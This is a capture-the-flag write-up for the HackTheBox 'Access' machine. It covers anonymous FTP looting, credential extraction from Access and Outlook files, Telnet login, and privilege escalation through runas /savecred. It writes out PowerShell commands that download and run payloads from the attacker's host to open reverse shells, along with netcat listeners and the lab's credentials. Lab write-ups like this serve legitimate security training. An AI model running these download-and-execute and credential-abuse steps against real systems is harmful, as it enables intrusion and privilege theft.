HackTheBox Access
Writeup for HackTheBox Access
Machine Synopsis
IP Address: 10.129.198.185 Key Exploitation Techniques:
- Information Leakage: Exploiting an anonymous FTP misconfiguration to download sensitive files.
- Credential Harvesting: Extracting credentials from a Microsoft Access database (
.mdb) and a password-protected Outlook data file (.pst). - Privilege Escalation: Abusing the
runas /savecredcommand to gain an elevated shell as theAdministrator.
1. Enumeration
Initial reconnaissance with nmap revealed three open ports on the target.
1
nmap -p 21,23,80 -sC -sV 10.129.198.185 -T4
Nmap Results:
- Port 21 (FTP):
Microsoft ftpdwith anonymous login allowed. - Port 23 (Telnet): An open Telnet service.
- Port 80 (HTTP):
Microsoft IIS httpd 7.5with the title “MegaCorp.”
The most significant finding was the anonymous FTP access. Although the directory listing failed initially, we could manually change directories and discover files.
File Enumeration via FTP
We connected to the FTP service and explored the directories, finding two notable files.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
ftp 10.129.198.185
Name: anonymous
Password: [press enter]
ftp> dir
# ...
<DIR> Backups
<DIR> Engineer
# ...
ftp> cd Backups
ftp> get backup.mdb
# ...
ftp> cd ../Engineer
ftp> get "Access Control.zip"
# ...
This confirmed we could download files from the server. The backup.mdb is a Microsoft Access database file, and Access Control.zip is a password-protected archive.
2. Exploitation: Information Leakage & Credential Harvesting
Step 2.1: Extracting Credentials from backup.mdb
The backup.mdb file likely contains sensitive data. We used mdb-export to dump the contents of the auth_user table, which contained a list of usernames and passwords.
1
2
3
4
5
mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
The output provided three sets of credentials:
admin:adminengineer:access4u@securitybackup_admin:admin
Step 2.2: Cracking the .zip Archive Password
The engineer user’s password, access4u@security, looked promising. We attempted to use it as the password for the Access Control.zip file, and it worked.
1
7z x "Access Control.zip" -paccess4u@security
The archive extracted a file named Access Control.pst. This is an Outlook data file, which can contain emails, contacts, and calendar items.
Step 2.3: Reading Access Control.pst
We used the readpst tool to convert the .pst file into a readable .eml format.
1
2
3
4
readpst -tea -m "Access Control.pst"
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
The tool created a directory named Access Control containing the extracted emails. We found an email from a user named john with the subject “MegaCorp Access Control System ‘security’ account.” The email contained the credentials for a new account.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
cat 2.eml
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--boundary-LibPST-iamunique-39011009_-_-"
----boundary-LibPST-iamunique-39011009_-_-
Content-Type: multipart/alternative;
boundary="alt---boundary-LibPST-iamunique-39011009_-_-"
--alt---boundary-LibPST-iamunique-39011009_-_-
Content-Type: text/plain; charset="utf-8"
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
Password: 4Cc3ssC0ntr0ller
Step 2.4: Initial Access via Telnet
We used the newly discovered credentials to log in via the Telnet service on port 23.
1
2
3
telnet 10.129.198.185
login: security
password: 4Cc3ssC0ntr0ller
A Telnet session was established, and the whoami command confirmed we were logged in as access\security. From here, we used a PowerShell reverse shell to gain a more stable and interactive shell.
1
powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.22/payload.ps1'))"
The payload.ps1 script, hosted on our attacking machine, executed and connected back to our listener.
1
2
3
4
5
6
Shiro ❯ rlwrap -cAr nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.129.198.185 49158
whoami
access\security
PS C:\Users\security>
3. Privilege Escalation
The security user is a standard user and does not have administrative privileges. To get a root shell, we needed to find a way to escalate privileges.
Step 3.1: Abusing runas /savecred
The cmdkey /list command reveals stored credentials for applications. In this case, it showed credentials for the Administrator user.
1
2
3
4
5
PS C:\Users\security> cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
The runas /savecred command allows a user to run an application as another user without re-entering the password, storing it as a credential. An important security note is that once a password has been saved for a user, it can be used with runas to execute any command as that user, not just the intended application.
PS C:\Users\security> Get-ChildItem "C:\" *.lnk -Recurse -Force | ft fullname | Out-File shortcuts.txt
PS C:\Users\security> ForEach($file in gc .\shortcuts.txt) { Write-Output $file; gc $file | Select-String runas }
FullName
-------- ...
C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk
L?F?@ ??7???7???#?P/P?O? ?:i?+00?/C:\R1M?:Windows???:?␦
M?:*wWindowsV1MV?System32???:?␦MV?*?System32X2P?:?
runas.exe@
???:1??:1?*Yrunas.exeL-K??E?C:\Windows\System32\runas.exe#..\..\..
\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /s
avecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.
ico?%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico
%SystemDrive%\ZKTeco\
ZKAccess3.5\img\AccessNET.ico
?%?
?wN?␦?]N?D.??Q???`?Xaccess?_???8{E?3
O?j)?H???
)??[?_???8{E?3
O?j)?H???
)??[? ??
1SPS??XF?L8C???&?m?e*S-1-5-21-953262931-566350628-63446256-500
...
PS C:\Users\security> PS C:\Users\security> icacls C:\Users\Public\Desktop
C:\Users\Public\Desktop BUILTIN\Administrators:(OI)(CI)(F)
NT AUTHORITY\INTERACTIVE:(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
ACCESS\Administrator:(OI)(CI)(IO)(DE,DC)
We confirmed that a shortcut (.lnk) file for the ZKAccess3.5 Security System application existed in the Public\Desktop directory and used the runas /savecred command.
We can use this stored credential to run a new PowerShell reverse shell as the Administrator.
1
PS C:\Users\security> runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.22/admin_payload.ps1')"
This command executed our second PowerShell payload, which connected back to a different listener on our machine, this time with Administrator privileges.
1
2
3
4
rlwrap -cAr nc -lvnp 8888
# ...
whoami
# access\administrator
We now have an elevated shell.
4. Flag Retrieval
With our elevated shell, we could access both the user and root flags.
1
2
3
4
PS C:\Windows\system32> type C:\Users\security\Desktop\user.txt
<redacted>
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
<redacted>